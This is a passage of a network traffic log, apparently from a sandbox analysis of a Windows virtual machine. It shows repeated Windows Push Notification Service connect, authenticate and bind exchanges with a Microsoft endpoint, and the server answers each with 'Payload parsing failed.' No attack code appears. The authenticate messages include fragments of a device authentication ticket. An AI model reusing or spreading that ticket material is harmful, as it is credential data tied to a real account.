2024-07-15 05:53:53 UTC	217	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 70 5a 4e 6f 59 53 38 74 76 30 75 37 36 6d 6f 41 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 31 37 61 65 39 38 62 35 30 63 65 35 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 196MS-CV: pZNoYS8tv0u76moA.3Context: 9417ae98b50ce55<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-15 05:53:53 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-15 05:53:53 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 77 2f 72 65 31 52 67 77 66 6b 79 5a 62 78 2f 36 57 57 4e 73 32 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: w/re1RgwfkyZbx/6WWNs2A.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.6	49729	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:53:56 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2b 2b 55 68 47 4a 4c 35 79 55 69 2f 43 4e 45 6b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 32 32 39 36 36 30 39 64 39 34 62 33 33 64 39 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: ++UhGJL5yUi/CNEk.1Context: 32296609d94b33d9
2024-07-15 05:53:56 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-15 05:53:56 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 2b 2b 55 68 47 4a 4c 35 79 55 69 2f 43 4e 45 6b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 32 32 39 36 36 30 39 64 39 34 62 33 33 64 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 55 51 45 69 4f 64 53 64 36 74 58 75 4f 53 32 42 43 37 65 2f 33 48 39 6e 63 69 32 48 6e 5a 4b 72 72 67 46 62 30 61 72 4d 46 57 34 34 64 46 79 4c 2f 6a 45 7a 54 70 72 67 76 2f 63 69 42 32 59 43 58 36 47 4f 48 2b 31 7a 35 7a 4e 45 75 4f 4a 76 5a 6f 64 67 42 52 62 67 71 42 6d 6e 30 57 56 5a 57 67 64 49 30 4e 33 6a 41 50 53 69 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: ++UhGJL5yUi/CNEk.2Context: 32296609d94b33d9<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATUQEiOdSd6tXuOS2BC7e/3H9nci2HnZKrrgFb0arMFW44dFyL/jEzTprgv/ciB2YCX6GOH+1z5zNEuOJvZodgBRbgqBmn0WVZWgdI0N3jAPSi
2024-07-15 05:53:56 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 2b 2b 55 68 47 4a 4c 35 79 55 69 2f 43 4e 45 6b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 32 32 39 36 36 30 39 64 39 34 62 33 33 64 39 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: ++UhGJL5yUi/CNEk.3Context: 32296609d94b33d9
2024-07-15 05:53:56 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-15 05:53:56 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 52 4a 68 6e 4b 50 4c 2b 46 45 65 34 5a 70 38 33 56 63 43 30 37 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: RJhnKPL+FEe4Zp83VcC07g.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.6	49734	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:54:05 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 55 55 58 55 43 4d 6e 6a 4c 55 47 72 78 4f 31 47 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 36 62 63 37 31 30 35 36 31 38 37 36 66 34 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: UUXUCMnjLUGrxO1G.1Context: 3d6bc710561876f4
2024-07-15 05:54:05 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-15 05:54:05 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 55 55 58 55 43 4d 6e 6a 4c 55 47 72 78 4f 31 47 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 36 62 63 37 31 30 35 36 31 38 37 36 66 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 55 51 45 69 4f 64 53 64 36 74 58 75 4f 53 32 42 43 37 65 2f 33 48 39 6e 63 69 32 48 6e 5a 4b 72 72 67 46 62 30 61 72 4d 46 57 34 34 64 46 79 4c 2f 6a 45 7a 54 70 72 67 76 2f 63 69 42 32 59 43 58 36 47 4f 48 2b 31 7a 35 7a 4e 45 75 4f 4a 76 5a 6f 64 67 42 52 62 67 71 42 6d 6e 30 57 56 5a 57 67 64 49 30 4e 33 6a 41 50 53 69 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: UUXUCMnjLUGrxO1G.2Context: 3d6bc710561876f4<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATUQEiOdSd6tXuOS2BC7e/3H9nci2HnZKrrgFb0arMFW44dFyL/jEzTprgv/ciB2YCX6GOH+1z5zNEuOJvZodgBRbgqBmn0WVZWgdI0N3jAPSi
2024-07-15 05:54:05 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 55 55 58 55 43 4d 6e 6a 4c 55 47 72 78 4f 31 47 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 36 62 63 37 31 30 35 36 31 38 37 36 66 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: UUXUCMnjLUGrxO1G.3Context: 3d6bc710561876f4<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-15 05:54:05 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-15 05:54:05 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 68 57 58 2f 70 5a 61 70 4d 55 75 2f 75 6c 4f 67 69 31 67 54 43 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: hWX/pZapMUu/ulOgi1gTCw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.6	49735	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:54:14 UTC	70	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 72 4a 4e 6c 48 6e 4c 35 50 30 75 6f 55 32 4f 66 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 39 36 62 37 61 64 38 33 64 32 38 32 35 33 0d 0a 0d 0a Data Ascii: CNT 1 CON 304MS-CV: rJNlHnL5P0uoU2Of.1Context: c96b7ad83d28253
2024-07-15 05:54:14 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-15 05:54:14 UTC	1063	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 30 0d 0a 4d 53 2d 43 56 3a 20 72 4a 4e 6c 48 6e 4c 35 50 30 75 6f 55 32 4f 66 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 39 36 62 37 61 64 38 33 64 32 38 32 35 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 55 51 45 69 4f 64 53 64 36 74 58 75 4f 53 32 42 43 37 65 2f 33 48 39 6e 63 69 32 48 6e 5a 4b 72 72 67 46 62 30 61 72 4d 46 57 34 34 64 46 79 4c 2f 6a 45 7a 54 70 72 67 76 2f 63 69 42 32 59 43 58 36 47 4f 48 2b 31 7a 35 7a 4e 45 75 4f 4a 76 5a 6f 64 67 42 52 62 67 71 42 6d 6e 30 57 56 5a 57 67 64 49 30 4e 33 6a 41 50 53 69 70 Data Ascii: ATH 2 CON\DEVICE 1040MS-CV: rJNlHnL5P0uoU2Of.2Context: c96b7ad83d28253<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATUQEiOdSd6tXuOS2BC7e/3H9nci2HnZKrrgFb0arMFW44dFyL/jEzTprgv/ciB2YCX6GOH+1z5zNEuOJvZodgBRbgqBmn0WVZWgdI0N3jAPSip
2024-07-15 05:54:14 UTC	73	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 35 0d 0a 4d 53 2d 43 56 3a 20 72 4a 4e 6c 48 6e 4c 35 50 30 75 6f 55 32 4f 66 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 39 36 62 37 61 64 38 33 64 32 38 32 35 33 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 55MS-CV: rJNlHnL5P0uoU2Of.3Context: c96b7ad83d28253
2024-07-15 05:54:15 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-15 05:54:15 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 61 32 59 54 31 62 33 7a 4d 45 69 78 6d 44 70 4d 52 52 67 59 38 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: a2YT1b3zMEixmDpMRRgY8g.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.6	49736	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:54:23 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 69 38 46 78 59 49 30 4d 47 45 47 75 6e 79 6e 37 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 38 37 62 32 34 37 35 38 63 33 38 38 61 36 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: i8FxYI0MGEGunyn7.1Context: 287b24758c388a60
2024-07-15 05:54:23 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-15 05:54:23 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 69 38 46 78 59 49 30 4d 47 45 47 75 6e 79 6e 37 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 38 37 62 32 34 37 35 38 63 33 38 38 61 36 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 55 51 45 69 4f 64 53 64 36 74 58 75 4f 53 32 42 43 37 65 2f 33 48 39 6e 63 69 32 48 6e 5a 4b 72 72 67 46 62 30 61 72 4d 46 57 34 34 64 46 79 4c 2f 6a 45 7a 54 70 72 67 76 2f 63 69 42 32 59 43 58 36 47 4f 48 2b 31 7a 35 7a 4e 45 75 4f 4a 76 5a 6f 64 67 42 52 62 67 71 42 6d 6e 30 57 56 5a 57 67 64 49 30 4e 33 6a 41 50 53 69 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: i8FxYI0MGEGunyn7.2Context: 287b24758c388a60<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATUQEiOdSd6tXuOS2BC7e/3H9nci2HnZKrrgFb0arMFW44dFyL/jEzTprgv/ciB2YCX6GOH+1z5zNEuOJvZodgBRbgqBmn0WVZWgdI0N3jAPSi
2024-07-15 05:54:23 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 69 38 46 78 59 49 30 4d 47 45 47 75 6e 79 6e 37 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 38 37 62 32 34 37 35 38 63 33 38 38 61 36 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: i8FxYI0MGEGunyn7.3Context: 287b24758c388a60<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-15 05:54:23 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-15 05:54:23 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 72 77 49 4f 2f 2b 74 73 75 6b 79 69 7a 4b 53 76 46 6a 37 68 4f 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: rwIO/+tsukyizKSvFj7hOQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.6	49738	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:54:38 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 7a 72 49 35 30 42 58 67 64 30 79 56 56 56 31 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 62 64 31 31 37 30 39 30 61 31 35 63 36 39 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: zrI50BXgd0yVVV1c.1Context: 8bd117090a15c69f
2024-07-15 05:54:38 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-15 05:54:38 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 7a 72 49 35 30 42 58 67 64 30 79 56 56 56 31 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 62 64 31 31 37 30 39 30 61 31 35 63 36 39 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 55 51 45 69 4f 64 53 64 36 74 58 75 4f 53 32 42 43 37 65 2f 33 48 39 6e 63 69 32 48 6e 5a 4b 72 72 67 46 62 30 61 72 4d 46 57 34 34 64 46 79 4c 2f 6a 45 7a 54 70 72 67 76 2f 63 69 42 32 59 43 58 36 47 4f 48 2b 31 7a 35 7a 4e 45 75 4f 4a 76 5a 6f 64 67 42 52 62 67 71 42 6d 6e 30 57 56 5a 57 67 64 49 30 4e 33 6a 41 50 53 69 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: zrI50BXgd0yVVV1c.2Context: 8bd117090a15c69f<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATUQEiOdSd6tXuOS2BC7e/3H9nci2HnZKrrgFb0arMFW44dFyL/jEzTprgv/ciB2YCX6GOH+1z5zNEuOJvZodgBRbgqBmn0WVZWgdI0N3jAPSi
2024-07-15 05:54:38 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 7a 72 49 35 30 42 58 67 64 30 79 56 56 56 31 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 62 64 31 31 37 30 39 30 61 31 35 63 36 39 66 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: zrI50BXgd0yVVV1c.3Context: 8bd117090a15c69f
2024-07-15 05:54:38 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-15 05:54:38 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 64 42 59 65 76 79 72 4d 5a 55 4b 79 63 58 64 71 64 4c 36 2b 41 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: dBYevyrMZUKycXdqdL6+AQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.6	49740	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:54:46 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 32 64 45 50 48 68 70 4f 56 6b 36 2b 74 70 57 31 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 37 38 38 62 32 33 33 61 66 36 34 39 61 38 39 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 2dEPHhpOVk6+tpW1.1Context: 2788b233af649a89
2024-07-15 05:54:46 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 